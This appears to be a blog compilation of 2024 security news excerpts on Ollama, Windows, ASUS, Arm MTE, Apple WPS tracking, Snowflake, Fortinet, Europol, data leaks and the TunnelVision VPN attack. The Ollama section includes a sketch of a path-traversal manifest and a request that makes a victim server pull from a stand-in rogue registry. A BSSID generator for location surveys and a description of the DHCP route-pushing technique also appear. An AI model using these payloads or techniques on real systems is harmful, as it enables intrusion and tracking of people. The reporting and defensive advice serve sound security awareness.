Patch now: ‘Easy-to-exploit’ RCE in open source Ollama

A now-patched vulnerability in Ollama – a popular open source project for running LLMs – can lead to remote code execution, according to flaw finders who warned that upwards of 1,000 vulnerable instances remain exposed to the internet.

Wiz Research disclosed the flaw, tracked as CVE-2024-37032 and dubbed Probllama, on May 5, and Ollama's maintainers fixed the issue in version 0.1.34, released via GitHub a day later.

Ollama is useful for performing inference with compatible neural networks – such as Meta’s Llama family, hence the name; Microsoft’s Phi clan; and models from Mistral – and it can be used on the command line or via a REST API. It has hundreds of thousands of monthly pulls on Docker Hub.

In a report published today, the Wiz bug hunting team’s Sagi Tzadik said the vulnerability is due to insufficient validation on the server side of that REST API provided by Ollama. An attacker could exploit the flaw by sending a specially crafted HTTP request to the Ollama API server — and in Docker installations, at least, the API server is publicly exposed.

The Ollama server provides multiple API endpoints that perform core functions. This includes the API endpoint /api/pull that lets users download models from the Ollama registry as well as private registries. As the researchers found, the process to trigger the download of a model was exploitable, allowing miscreants to potentially compromise the environment hosting a vulnerable Ollama server.

“What we found is that when pulling a model from a private registry (by querying the http://[victim]:11434/api/pull API endpoint), it is possible to supply a malicious manifest file that contains a path traversal payload in the digest field,” Tzadik explained.

An attacker could then use that payload to corrupt files on the system, achieve arbitrary file read, and ultimately remote code execution (RCE) to hijack that system.
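
To make the mechanics concrete, here is a rough sketch of the two halves of such an attack. It is illustrative only: the manifest mirrors the OCI-style layout described in Wiz's write-up, but the field values, the rogue registry hostname, the traversal target, and the exact /api/pull parameters are assumptions rather than a verified exploit, and it should obviously only be pointed at systems you own.

import json
import requests  # assumes the third-party 'requests' package is installed

# 1) A rogue registry controlled by the attacker serves a manifest whose layer
#    "digest" carries a path-traversal payload instead of a real sha256 digest.
#    A vulnerable server used the digest to build a local file path without
#    sanitising it, so "../" sequences escape the models directory.
malicious_manifest = {
    "schemaVersion": 2,
    "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
    "config": {"digest": "sha256:" + "0" * 64, "size": 2},
    "layers": [
        {
            "mediaType": "application/vnd.ollama.image.model",
            "digest": "../../../../../../tmp/traversal-demo",  # hypothetical traversal target
            "size": 5,
        }
    ],
}
print(json.dumps(malicious_manifest, indent=2))

# 2) The attacker then asks the exposed victim server to pull a "model" from
#    that rogue registry, causing the victim to fetch and act on the manifest.
requests.post(
    "http://victim.example:11434/api/pull",
    json={"name": "evil-registry.example/library/anything:latest", "insecure": True},
    timeout=30,
)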

“This issue is extremely severe in Docker installations, as the server runs with root privileges and listens on 0.0.0.0 by default – which enables remote exploitation of this vulnerability,” Tzadik emphasized.

And despite a patched version of the project being available for over a month, the Wiz kids found that, as of June 10, there were more than 1,000 vulnerable Ollama server instances still exposed to the internet. In light of this, there are a couple of things anyone using Ollama should do to protect their AI applications.

First, and this should go without saying, update instances to version 0.1.34 or newer. Also, because Ollama doesn't have built-in authentication, do not expose installations to the internet unless you put some form of authentication in front of them, such as a reverse proxy that requires credentials. Better still, don't allow the internet to reach the server at all: put it behind a firewall and only allow authorized internal applications and their users to access it.
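
As a quick sanity check, something like the sketch below can confirm whether an instance answers on a given interface and which version it reports. It is a minimal sketch assuming the default port 11434 and Ollama's public /api/version endpoint; only point it at hosts you operate.

import sys
import requests  # assumes the third-party 'requests' package is installed

host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
try:
    r = requests.get(f"http://{host}:11434/api/version", timeout=5)
    version = r.json().get("version", "unknown")
    print(f"Ollama answered on {host}:11434, reporting version {version}")
    print("If this host is reachable from the internet, firewall it or front it "
          "with authentication, and make sure it runs 0.1.34 or newer.")
except requests.RequestException:
    print(f"No Ollama API reachable on {host}:11434")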

“The critical issue is not just the vulnerabilities themselves but the inherent lack of authentication support in these new tools,” Tzadik noted, referring to previous RCEs in other tools used to deploy LLMs including TorchServe and Ray Anyscale.

Plus, he added, even though these tools are new and often written in modern safety-first programming languages, “classic vulnerabilities such as path traversal remain an issue.” ®

Source: Patch now: ‘Easy-to-exploit’ RCE in open source Ollama

Microsoft fixes hack-me-via-Wi-Fi Windows security hole

[…] CVE-2024-30078, a Wi-Fi driver remote code execution hole rated 8.8 in severity. It’s not publicly disclosed, not yet under attack, and exploitation is “less likely,” according to Redmond.

“An unauthenticated attacker could send a malicious networking packet to an adjacent system that is employing a Wi-Fi networking adapter, which could enable remote code execution,” and thus remotely, silently, and wirelessly run malware or spyware on that nearby victim’s computer, Microsoft admitted.

Childs said: “Considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.” Patch as soon as you can: This flaw can be abused to run malicious software on and hijack a nearby Windows PC via its Wi-Fi with no authentication needed. Pretty bad. […]

Source: Microsoft fixes hack-me-via-Wi-Fi Windows security hole • The Register

ASUS Releases Firmware Update for Critical Remote Authentication Bypass Affecting Seven Routers

A report from BleepingComputer notes that ASUS “has released a new firmware update that addresses a vulnerability impacting seven router models that allow remote attackers to log in to devices.” But there’s more bad news: Taiwan’s CERT has also informed the public about CVE-2024-3912 in a post yesterday, which is a critical (9.8) arbitrary firmware upload vulnerability allowing unauthenticated, remote attackers to execute system commands on the device. The flaw impacts multiple ASUS router models, but not all will be getting security updates due to them having reached their end-of-life (EoL).

Finally, ASUS announced an update to Download Master, a utility used on ASUS routers that enables users to manage and download files directly to a connected USB storage device via torrent, HTTP, or FTP. The newly released Download Master version 3.1.0.114 addresses five medium to high-severity issues concerning arbitrary file upload, OS command injection, buffer overflow, reflected XSS, and stored XSS problems.

Source: https://mobile.slashdot.org/story/24/06/17/0237229/asus-releases-firmware-update-for-critical-remote-authentication-bypass-affecting-seven-routers

Arm Memory Tag Extensions broken by speculative execution

In 2018, chip designer Arm introduced a hardware security feature called Memory Tagging Extensions (MTE) as a defense against memory safety bugs. But it may not be as effective as first hoped.

Implemented and supported last year in Google’s Pixel 8 and Pixel 8 Pro phones and previously in Linux, MTE aims to help detect memory safety violations, as well as hardening devices against attacks that attempt to exploit memory safety flaws.

[…]

MTE works by tagging blocks of physical memory with metadata. This metadata serves as a key that permits access. When a pointer references data within a tagged block of memory, the hardware checks to make sure the pointer contains a key matching that of the memory block before granting access to the data. A mismatch raises an error.

Tag, you’re IT

Diving deeper, when MTE is active, programs can use special instructions to tag 16-byte blocks of physical memory with a 4-bit key. For example, when allocating a chunk of memory from the heap, that chunk (aligned and rounded to 16 bytes) can be tagged with the same 4-bit key, and a pointer to that chunk is generated containing the key in its upper unused bits.

When the program uses that pointer in future, referencing some part of the block, everything works fine. The pointer still contains the correct key. But if the block is freed and its key is changed, subsequent use of that stale pointer will trigger a fault by the processor, due to a mismatching key, which indicates a programming bug or a vulnerability exploit attempt, both of which you want to catch.

And if the program is hijacked via some other vulnerability, and the code is made to reference a tagged block without the right key in the pointer, that will also be caught.
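
The toy model below (Python, purely for illustration; real MTE stores the allocation tag as hardware-managed metadata and performs the check in silicon) mimics that flow: allocations are tagged per 16-byte granule, pointers carry a 4-bit logical tag in otherwise-unused upper bits, and a stale pointer whose tag no longer matches the memory's tag faults.

TAG_SHIFT = 56   # MTE places the logical tag in the pointer's top byte
GRANULE = 16     # tags apply to 16-byte granules of physical memory

memory_tags = {}  # granule address -> 4-bit allocation tag (simulated metadata)

def tag_allocation(addr, size, tag):
    """Tag every 16-byte granule covered by an allocation."""
    for g in range(addr, addr + size, GRANULE):
        memory_tags[g] = tag & 0xF

def make_tagged_pointer(addr, tag):
    """Embed the logical tag in the pointer's unused upper bits."""
    return addr | ((tag & 0xF) << TAG_SHIFT)

def load(ptr):
    """Simulated load: fault if pointer tag and allocation tag differ."""
    addr = ptr & ((1 << TAG_SHIFT) - 1)
    granule = addr - (addr % GRANULE)
    if memory_tags.get(granule) != (ptr >> TAG_SHIFT) & 0xF:
        raise RuntimeError("tag check fault")
    return f"ok: read at {hex(addr)}"

chunk = 0x10000
tag_allocation(chunk, 32, tag=0x3)
p = make_tagged_pointer(chunk, 0x3)
print(load(p))                       # tags match: access allowed

tag_allocation(chunk, 32, tag=0x9)   # chunk freed and re-tagged
try:
    load(p)                          # stale pointer: tag no longer matches
except RuntimeError as err:
    print("caught:", err)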

[…]

Unfortunately, MTE appears to be insufficiently secure to fulfill its security promises. Researchers affiliated with Seoul National University in South Korea, Samsung Research, and Georgia Institute of Technology in the US have found that they can break MTE through speculative execution.

The authors – Juhee Kim, Jinbum Park, Sihyeon Roh, Jaeyoung Chung, Youngjoo Lee, Taesoo Kim, and Byoungyoung Lee – say as much in their research paper, “TikTag: Breaking Arm’s Memory Tagging Extension with Speculative Execution.”

Having looked at MTE to assess whether it provides the claimed security benefit, the boffins say it does not. Instead, they found they could extract MTE tags in under four seconds around 95 per cent of the time.

“[W]e found that speculative execution attacks are indeed possible against MTE, which severely harms the security assurance of MTE,” the authors report. “We discovered two new gadgets, named TIKTAG-v1 and TIKTAG-v2, which can leak the MTE tag of an arbitrary memory address.”

[…]

The authors say that their research expands on prior work from May 2024 that found MTE vulnerable to speculative probing. What’s more, they contend their findings challenge work by Google’s Project Zero that found no side-channel attack capable of breaking MTE.

Using proof-of-concept code, MTE tags were ferreted out of Google Chrome on Android and the Linux kernel using this technique, with a success rate that exceeded 95 percent in less than four seconds, it’s claimed.

The authors have made their code available on GitHub. “When TikTag gadgets are speculatively executed, cache state differs depending on whether the gadgets trigger a tag check fault or not,” the code repo explains. “Therefore, by observing the cache states, it is possible to leak the tag check results without raising any exceptions.”

Access to leaked tags doesn’t ensure exploitation. It simply means that an attacker capable of exploiting a particular memory bug on an affected device wouldn’t be thwarted by MTE.

The researchers disclosed their findings to Arm, which acknowledged them in a developer note published in December 2023. The chip design firm said that timing differences in successful and failed tag checking can be enough to create an MTE speculative oracle – a mechanism to reveal MTE tags – in Cortex-X2, Cortex-X3, Cortex-A510, Cortex-A520, Cortex-A710, Cortex-A715, and Cortex-A720 processors.

[…]

Source: Arm Memory Tag Extensions broken by speculative execution • The Register

Wi-Fi Routers are like trackers available to everyone

Apple and the satellite-based broadband service Starlink each recently took steps to address new research into the potential security and privacy implications of how their services geo-locate devices. Researchers from the University of Maryland say they relied on publicly available data from Apple to track the location of billions of devices globally — including non-Apple devices like Starlink systems — and found they could use this data to monitor the destruction of Gaza, as well as the movements and in many cases identities of Russian and Ukrainian troops.

At issue is the way that Apple collects and publicly shares information about the precise location of all Wi-Fi access points seen by its devices. Apple collects this location data to give Apple devices a crowdsourced, low-power alternative to constantly requesting global positioning system (GPS) coordinates.

Both Apple and Google operate their own Wi-Fi-based Positioning Systems (WPS) that obtain certain hardware identifiers from all wireless access points that come within range of their mobile devices. Both record the Media Access Control (MAC) address that a Wi-Fi access point uses, known as a Basic Service Set Identifier or BSSID.

Periodically, Apple and Google mobile devices will forward their locations — by querying GPS and/or by using cellular towers as landmarks — along with any nearby BSSIDs. This combination of data allows Apple and Google devices to figure out where they are within a few feet or meters, and it’s what allows your mobile phone to continue displaying your planned route even when the device can’t get a fix on GPS.

[…]

In essence, Google’s WPS computes the user’s location and shares it with the device. Apple’s WPS gives its devices a large enough amount of data about the location of known access points in the area that the devices can do that estimation on their own.
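
Apple has not published the client-side algorithm, so the sketch below is only a toy illustration of the idea: given the coordinates a WPS returns for nearby access points, a device can estimate its own position locally, here with a crude signal-strength-weighted centroid. The coordinates and RSSI values are made up.

def estimate_position(observations):
    """observations: list of (lat, lon, rssi_dbm) for BSSIDs heard nearby."""
    # Crude weighting: a stronger signal (less negative RSSI) counts for more.
    weights = [10 ** (rssi / 20.0) for _, _, rssi in observations]
    total = sum(weights)
    lat = sum(w * o[0] for w, o in zip(weights, observations)) / total
    lon = sum(w * o[1] for w, o in zip(weights, observations)) / total
    return lat, lon

nearby = [
    (38.9897, -76.9378, -45),   # hypothetical AP locations from a WPS lookup
    (38.9901, -76.9369, -60),
    (38.9893, -76.9384, -72),
]
print(estimate_position(nearby))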

That’s according to two researchers at the University of Maryland, who theorized they could use the verbosity of Apple’s API to map the movement of individual devices into and out of virtually any defined area of the world. The UMD pair said they spent a month early in their research continuously querying the API, asking it for the location of more than a billion BSSIDs generated at random.

They learned that while only about three million of those randomly generated BSSIDs were known to Apple’s Wi-Fi geolocation API, Apple also returned an additional 488 million BSSID locations already stored in its WPS from other lookups.
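
Generating candidate BSSIDs for that kind of brute-force survey is trivial, as the sketch below shows. It only produces random MAC-format identifiers; the actual WPS query protocol is deliberately not reproduced here.

import random

def random_bssid():
    octets = [random.randint(0, 255) for _ in range(6)]
    octets[0] &= 0xFE   # clear the multicast bit so the address is a valid unicast MAC
    octets[0] &= 0xFD   # clear the locally-administered bit; globally assigned
                        # addresses are (hypothetically) likelier to belong to real APs
    return ":".join(f"{o:02x}" for o in octets)

print([random_bssid() for _ in range(5)])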

[…]

Plotting the locations returned by Apple’s WPS between November 2022 and November 2023, Levin and Rye saw they had a near global view of the locations tied to more than two billion Wi-Fi access points. The map showed geolocated access points in nearly every corner of the globe, apart from almost the entirety of China, vast stretches of desert wilderness in central Australia and Africa, and deep in the rainforests of South America.

A “heatmap” of BSSIDs the UMD team said they discovered by guessing randomly at BSSIDs.

The researchers said that by zeroing in on or “geofencing” other smaller regions indexed by Apple’s location API, they could monitor how Wi-Fi access points moved over time. Why might that be a big deal? They found that by geofencing active conflict zones in Ukraine, they were able to determine the location and movement of Starlink devices used by both Ukrainian and Russian forces.

The reason they were able to do that is that each Starlink terminal — the dish and associated hardware that allows a Starlink customer to receive Internet service from a constellation of orbiting Starlink satellites — includes its own Wi-Fi access point, whose location is going to be automatically indexed by any nearby Apple devices that have location services enabled.

A heatmap of Starlink routers in Ukraine. Image: UMD.

The University of Maryland team geo-fenced various conflict zones in Ukraine, and identified at least 3,722 Starlink terminals geolocated in Ukraine.

“We find what appear to be personal devices being brought by military personnel into war zones, exposing pre-deployment sites and military positions,” the researchers wrote. “Our results also show individuals who have left Ukraine to a wide range of countries, validating public reports of where Ukrainian refugees have resettled.”

[…]

The researchers also focused their geofencing on the Israel-Hamas war in Gaza, and were able to track the migration and disappearance of devices throughout the Gaza Strip as Israeli forces cut power to the country and bombing campaigns knocked out key infrastructure.

“As time progressed, the number of Gazan BSSIDs that are geolocatable continued to decline,” they wrote. “By the end of the month, only 28% of the original BSSIDs were still found in the Apple WPS.”

In late March 2024, Apple quietly updated its website to note that anyone can opt out of having the location of their wireless access points collected and shared by Apple — by appending “_nomap” to the end of the Wi-Fi access point’s name (SSID). Adding “_nomap” to your Wi-Fi network name also blocks Google from indexing its location.

[…]

Rye said Apple’s response addressed the most depressing aspect of their research: That there was previously no way for anyone to opt out of this data collection.

“You may not have Apple products, but if you have an access point and someone near you owns an Apple device, your BSSID will be in [Apple’s] database,” he said. “What’s important to note here is that every access point is being tracked, without opting in, whether they run an Apple device or not. Only after we disclosed this to Apple have they added the ability for people to opt out.”

The researchers said they hope Apple will consider additional safeguards, such as proactive ways to limit abuses of its location API.

[…]

“We observe routers move between cities and countries, potentially representing their owner’s relocation or a business transaction between an old and new owner,” they wrote. “While there is not necessarily a 1-to-1 relationship between Wi-Fi routers and users, home routers typically only have several. If these users are vulnerable populations, such as those fleeing intimate partner violence or a stalker, their router simply being online can disclose their new location.”

The researchers said Wi-Fi access points that can be created using a mobile device’s built-in cellular modem do not create a location privacy risk for their users because mobile phone hotspots will choose a random BSSID when activated.

[…]

For example, they discovered that certain commonly used travel routers compound the potential privacy risks.

“Because travel routers are frequently used on campers or boats, we see a significant number of them move between campgrounds, RV parks, and marinas,” the UMD duo wrote. “They are used by vacationers who move between residential dwellings and hotels. We have evidence of their use by military members as they deploy from their homes and bases to war zones.”

A copy of the UMD research is available here (PDF).

Source: Why Your Wi-Fi Router Doubles as an Apple AirTag – Krebs on Security

Over 165 Snowflake customers didn’t use MFA, says Mandiant

An unknown financially motivated crime crew has swiped a “significant volume of records” from Snowflake customers’ databases using stolen credentials, according to Mandiant.

“To date, Mandiant and Snowflake have notified approximately 165 potentially exposed organizations,” the Google-owned threat hunters wrote on Monday, and noted they track the perps as “UNC5537.”

The crew behind the Snowflake intrusions may have ties to Scattered Spider, aka UNC3944 – the notorious gang behind the mid-2023 Las Vegas casino breaches.

“Mandiant is investigating the possibility that a member of UNC5537 collaborated with UNC3944 on at least one past intrusion in the past six months, but we don’t have enough data to confidently link UNC5537 to a broader group at this time,” senior threat analyst Austin Larsen told The Register.

Mandiant – one of the incident response firms hired by Snowflake to help investigate its recent security incident – also noted that there’s no evidence a breach of Snowflake’s own enterprise environment was to blame for its customers’ breaches.

“Instead, every incident Mandiant responded to associated with this campaign was traced back to compromised customer credentials,” the Google-owned threat hunters confirmed.

The earliest detected attack against a Snowflake customer instance happened on April 14. Upon investigating that breach, Mandiant says it determined that UNC5537 used legitimate credentials – previously stolen using infostealer malware – to break into the victim’s Snowflake environment and exfiltrate data. The victim did not have multi-factor authentication turned on.

About a month later, after uncovering “multiple” Snowflake customer compromises, Mandiant contacted the cloud biz and the two began notifying affected organizations. By May 24 the criminals had begun selling the stolen data online, and on May 30 Snowflake issued its statement about the incidents.

After gaining initial access – which we’re told occurred through the Snowflake native web-based user interface or a command-line interface running on Windows Server 2022 – the criminals used a horribly named utility, “rapeflake,” which Mandiant has instead chosen to track as “FROSTBITE.”

UNC5537 has used both .NET and Java versions of this tool to perform reconnaissance against targeted Snowflake customers, allowing the gang to identify users, their roles, and IP addresses.

The crew also sometimes uses DBeaver Ultimate – a publicly available database management utility – to query Snowflake instances.

Several of the initial compromises occurred on contractor systems that were being used for both work and personal activities.

“These devices, often used to access the systems of multiple organizations, present a significant risk,” Mandiant researchers wrote. “If compromised by infostealer malware, a single contractor’s laptop can facilitate threat actor access across multiple organizations, often with IT and administrator-level privileges.”

All of the successful intrusions had three things in common, according to Mandiant. First, the victims didn’t use MFA.

Second, the attackers used valid credentials, “hundreds” of which were stolen thanks to infostealer infections – some as far back as 2020. Common variants used included VIDAR, RISEPRO, REDLINE, RACCOON STEALER, LUMMA and METASTEALER. But even in these years-old thefts, the credentials had not been updated or rotated.

Almost 80 percent of the customer accounts accessed by UNC5537 had prior credential exposure, we’re told.

Finally, the compromised accounts did not have network allow-lists in place. So if you are a Snowflake customer, it’s time to get a little smarter.

Source: Over 165 Snowflake customers didn’t use MFA, says Mandiant • The Register

Oddly enough, they don’t mention the Ticketmaster hack of more than 560 million accounts, which was confirmed as part of what appears to be a spree hitting Snowflake customers, despite the size of that breach. Also oddly, when you Google Snowflake you get the corporate page and some Wikipedia entries, but not very much about the hack. Considering the size and breadth of the problem, this is surprising. But perhaps not, considering Mandiant is a part of Google.

China state hackers infected 20,000 govt and defence Fortinet VPNs via a critical vulnerability exploited for at least two months before disclosure

Hackers working for the Chinese government gained access to more than 20,000 VPN appliances sold by Fortinet using a critical vulnerability that the company failed to disclose for two weeks after fixing it, Netherlands government officials said.

The vulnerability, tracked as CVE-2022-42475, is a heap-based buffer overflow that allows hackers to remotely execute malicious code. It carries a severity rating of 9.8 out of 10. A maker of network security software, Fortinet silently fixed the vulnerability on November 28, 2022, but failed to mention the threat until December 12 of that year, when the company said it became aware of an “instance where this vulnerability was exploited in the wild.” On January 11, 2023—more than six weeks after the vulnerability was fixed—Fortinet warned a threat actor was exploiting it to infect government and government-related organizations with advanced custom-made malware.

Enter CoatHanger

The Netherlands officials first reported in February that Chinese state hackers had exploited CVE-2022-42475 to install an advanced and stealthy backdoor tracked as CoatHanger on Fortigate appliances inside the Dutch Ministry of Defense. Once installed, the never-before-seen malware, specifically designed for the underlying FortiOS operating system, was able to permanently reside on devices even when rebooted or receiving a firmware update. CoatHanger could also escape traditional detection measures, the officials warned. The damage resulting from the breach was limited, however, because infections were contained inside a segment reserved for non-classified uses.

On Monday, officials with the Military Intelligence and Security Service (MIVD) and the General Intelligence and Security Service in the Netherlands said that to date, Chinese state hackers have used the critical vulnerability to infect more than 20,000 FortiGate VPN appliances sold by Fortinet. Targets include dozens of Western government agencies, international organizations, and companies within the defense industry.

“Since then, the MIVD has conducted further investigation and has shown that the Chinese cyber espionage campaign appears to be much more extensive than previously known,” Netherlands officials with the National Cyber Security Center wrote. “The NCSC therefore calls for extra attention to this campaign and the abuse of vulnerabilities in edge devices.”

Monday’s report said that exploitation of the vulnerability started two months before Fortinet first disclosed it and that 14,000 servers were backdoored during this zero-day period. The officials warned that the Chinese threat group likely still has access to many victims because CoatHanger is so hard to detect and remove.

[…]

Fortinet’s failure to timely disclose is particularly acute given the severity of the vulnerability. Disclosures are crucial because they help users prioritize the installation of patches. When a new version fixes minor bugs, many organizations often wait to install it. When it fixes a vulnerability with a 9.8 severity rating, they’re much more likely to expedite the update process. Given the vulnerability was being exploited even before Fortinet fixed it, the disclosure likely wouldn’t have prevented all of the infections, but it stands to reason it could have stopped some.

Fortinet officials have never explained why they didn’t disclose the critical vulnerability when it was fixed. They have also declined to disclose what the company policy is for the disclosure of security vulnerabilities. Company representatives didn’t immediately respond to an email seeking comment for this post.

Source: China state hackers infected 20,000 Fortinet VPNs, Dutch spy service says | Ars Technica

Largest ever operation by Europol against botnets hits dropper malware ecosystem

Between 27 and 29 May 2024 Operation Endgame, coordinated from Europol’s headquarters, targeted droppers including IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The actions focused on disrupting criminal services by arresting High Value Targets, taking down the criminal infrastructures and freezing illegal proceeds. This approach had a global impact on the dropper ecosystem. The malware, whose infrastructure was taken down during the action days, facilitated attacks with ransomware and other malicious software. Following the action days, eight fugitives linked to these criminal activities, wanted by Germany, will be added to Europe’s Most Wanted list on 30 May 2024. The individuals are wanted for their involvement in serious cybercrime activities.

This is the largest ever operation against botnets, which play a major role in the deployment of ransomware. The operation, initiated and led by France, Germany and the Netherlands was also supported by Eurojust and involved Denmark, the United Kingdom and the United States. In addition, Armenia, Bulgaria, Lithuania, Portugal, Romania, Switzerland and Ukraine also supported the operation with different actions, such as arrests, interviewing suspects, searches, and seizures or takedowns of servers and domains. The operation was also supported by a number of private partners at national and international level including Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus and DIVD.

The coordinated actions led to:

  • 4 arrests (1 in Armenia and 3 in Ukraine)
  • 16 location searches (1 in Armenia, 1 in the Netherlands, 3 in Portugal and 11 in Ukraine)
  • Over 100 servers taken down or disrupted in Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the United Kingdom, the United States and Ukraine
  • Over 2 000 domains under the control of law enforcement

Furthermore, it has been discovered through the investigations so far that one of the main suspects has earned at least EUR 69 million in cryptocurrency by renting out criminal infrastructure sites to deploy ransomware.

[…]

Operation Endgame does not end today. New actions will be announced on the website Operation Endgame. In addition, suspects involved in these and other botnets, who have not yet been arrested, will be directly called to account for their actions. Suspects and witnesses will find information on how to reach out via this website.

Command post at Europol to coordinate the operational actions

Europol facilitated the information exchange and provided analytical, crypto-tracing and forensic support to the investigation. To support the coordination of the operation, Europol organised more than 50 coordination calls with all the countries as well as an operational sprint at its headquarters.

Over 20 law enforcement officers from Denmark, France, Germany and the United States supported the coordination of the operational actions from the command post at Europol, alongside hundreds of other officers from the different countries involved in the actions. In addition, a virtual command post allowed real-time coordination between the Armenian, French, Portuguese and Ukrainian officers deployed on the spot during the field activities.

The command post at Europol facilitated the exchange of intelligence on seized servers, suspects and the transfer of seized data. Local command posts were also set up in Germany, the Netherlands, Portugal, the United States and Ukraine. Eurojust supported the action by setting up a coordination centre at its headquarters to facilitate the judicial cooperation between all authorities involved. Eurojust also assisted with the execution of European Arrest Warrants and European Investigation Orders.

[…]

Source: Largest ever operation against botnets hits dropper malware ecosystem | Europol

2.8M US folks’ personal info swiped in Sav-Rx IT heist – 8 months ago

Sav-Rx has started notifying about 2.8 million people that their personal information was likely stolen during an IT intrusion that happened more than seven months ago.

The biz provides prescription drug management services to more than 10 million US workers and their families, via their employers or unions. It first spotted the network “interruption” on October 8 last year and notes the break-in likely occurred five days earlier, according to a FAQ page about the incident posted on the Sav-Rx website.

Sav-Rx says it restored the IT systems to normal the following business day, and that all prescriptions were shipped on time and without delay. It also notified the police and called in some experts for a deeper dive into the logs.

An “extensive review” completed by a third-party security team on April 30 confirmed “some of the data accessed or acquired by the unauthorized third party may have contained personal information.”

The security breach affected 2,812,336 people, according to an incident notification filed with the Maine attorney general by A&A Services, doing business as Sav-Rx. Potentially stolen details include patients’ names, dates of birth, social security numbers, email addresses, mailing addresses, phone numbers, eligibility data, and insurance identification numbers.

“Please note that other than these data elements, the threat actor did not have access to clinical or financial information,” the notice reads.

While there’s no indication that the crooks have “made any use of your data as a result of this security incident,” Sav-Rx is providing everyone with two years of free credit and identity monitoring, as seems to be standard practice.

There’s also an oddly worded line about what happened that notes, “in conjunction with third-party experts, we have confirmed that any data acquired from our IT system was destroyed and not further disseminated.”

The Register contacted Sav-Rx with several questions about the network breach — including how it confirmed the data was destroyed and if the crooks demanded a payment — and did not receive a response. We will update this story when we hear back. It seems like some form of ransomware or extortion.

Either anticipating, or already receiving, inquiries about the lag between discovering the intrusion and notifying affected parties, the FAQ also includes a “Why wasn’t I contacted sooner?” question.

“Our initial priority was restoring systems to minimize any interruption to patient care,” it answers.

And then, after securing the IT systems and hiring the incident response team, Sav-Rx launched an investigation to determine who had been affected, and what specific personal information had been stolen for each of them.

Then, it sounds like there was some back-and-forth between healthcare bodies and Sav-Rx as to who would notify people that their data had been stolen. Here’s what the company says to that point:

We prioritized this technological investigation to be able to provide affected individuals with as much accurate information as possible. We received the results of that investigation on April 30, 2024, and promptly sent notifications to our health plan customers whose participant data was affected within 48 hours.

We offered to provide affected individuals notification, and once we confirmed that their respective health plans wanted us to provide notice to their participants, we worked expediently to mail notices to the affected individuals.

It’s unclear if this will be enough to satisfy affected customers. But in a statement to reporters, Roger Grimes, of infosec house KnowBe4, said the short answer is probably not.

“I don’t think the eight months it took Sav-Rx to notify impacted customers of the breach is going to fly with anyone, least of all their customers,” Grimes said.

“Today, you’ve got most companies notifying impacted customers in days to a few weeks,” he added. “Eight months? Whoever decided on that decision is likely to come under some heat and have explaining to do.”

Sav-Rx claims to have implemented a “number of detailed and immediate mitigation measures” to improve its security after the digital break-in. This includes “enhancing” its always-on security operations center, and adding new firewalls, antivirus software, and multi-factor authentication.

The organization also says it has since implemented a patching cycle and network segmentation and taken other measures to harden its systems. Hopefully it can also speed up its response times if it happens again.

Source: 2.8M US folks’ personal info swiped in Sav-Rx IT heist • The Register

US Patent and Trademark Office confirms another leak of filers’ address data

The federal government agency responsible for granting patents and trademarks is alerting thousands of filers whose private addresses were exposed following a second data spill in as many years.

The U.S. Patent and Trademark Office (USPTO) said in an email to affected trademark applicants this week that their private domicile address — which can include their home address — appeared in public records between August 23, 2023 and April 19, 2024.

U.S. trademark law requires that applicants include a private address when filing their paperwork with the agency to prevent fraudulent trademark filings.

USPTO said that while no addresses appeared in regular searches on the agency’s website, about 14,000 applicants’ private addresses were included in bulk datasets that USPTO publishes online to aid academic and economic research.

The agency took blame for the incident, saying the addresses were “inadvertently exposed as we transitioned to a new IT system,” according to the email to affected applicants, which TechCrunch obtained. “Importantly, this incident was not the result of malicious activity,” the email said.

Upon discovery of the security lapse, the agency said it “blocked access to the impacted bulk data set, removed files, implemented a patch to fix the exposure, tested our solution, and re-enabled access.”

If this sounds remarkably familiar, USPTO had a similar exposure of applicants’ address data last June. At the time, USPTO said it inadvertently exposed about 61,000 applicants’ private addresses in a years-long data spill in part through the release of its bulk datasets, and told affected individuals that the issue was fixed.

[…]

Source: US Patent and Trademark Office confirms another leak of filers’ address data | TechCrunch

Attack against virtually all VPN apps neuters their entire purpose

Researchers have devised an attack against nearly all virtual private network applications that forces them to send and receive some or all traffic outside of the encrypted tunnel designed to protect it from snooping or tampering.

TunnelVision, as the researchers have named their attack, largely negates the entire purpose and selling point of VPNs, which is to encapsulate incoming and outgoing Internet traffic in an encrypted tunnel and to cloak the user’s IP address. The researchers believe it affects all VPN applications when they’re connected to a hostile network and that there are no ways to prevent such attacks except when the user’s VPN runs on Linux or Android. They also said their attack technique may have been possible since 2002 and may already have been discovered and used in the wild since then.

Reading, dropping, or modifying VPN traffic

The effect of TunnelVision is “the victim’s traffic is now decloaked and being routed through the attacker directly,” a video demonstration explained. “The attacker can read, drop or modify the leaked traffic and the victim maintains their connection to both the VPN and the Internet.”

TunnelVision – CVE-2024-3661 – Decloaking Full and Split Tunnel VPNs – Leviathan Security Group.

The attack works by manipulating the DHCP server that allocates IP addresses to devices trying to connect to the local network. A setting known as option 121 allows the DHCP server to override default routing rules that send VPN traffic through a local IP address that initiates the encrypted tunnel. By using option 121 to route VPN traffic through the DHCP server, the attack diverts the data to the DHCP server itself. Researchers from Leviathan Security explained:

Our technique is to run a DHCP server on the same network as a targeted VPN user and to also set our DHCP configuration to use itself as a gateway. When the traffic hits our gateway, we use traffic forwarding rules on the DHCP server to pass traffic through to a legitimate gateway while we snoop on it.

We use DHCP option 121 to set a route on the VPN user’s routing table. The route we set is arbitrary and we can also set multiple routes if needed. By pushing routes that are more specific than a /0 CIDR range that most VPNs use, we can make routing rules that have a higher priority than the routes for the virtual interface the VPN creates. We can set multiple /1 routes to recreate the 0.0.0.0/0 all traffic rule set by most VPNs.

Pushing a route also means that the network traffic will be sent over the same interface as the DHCP server instead of the virtual network interface. This is intended functionality that isn’t clearly stated in the RFC. Therefore, for the routes we push, it is never encrypted by the VPN’s virtual interface but instead transmitted by the network interface that is talking to the DHCP server. As an attacker, we can select which IP addresses go over the tunnel and which addresses go over the network interface talking to our DHCP server.

A malicious DHCP option 121 route that causes traffic to never be encrypted by the VPN process. Image: Leviathan Security.

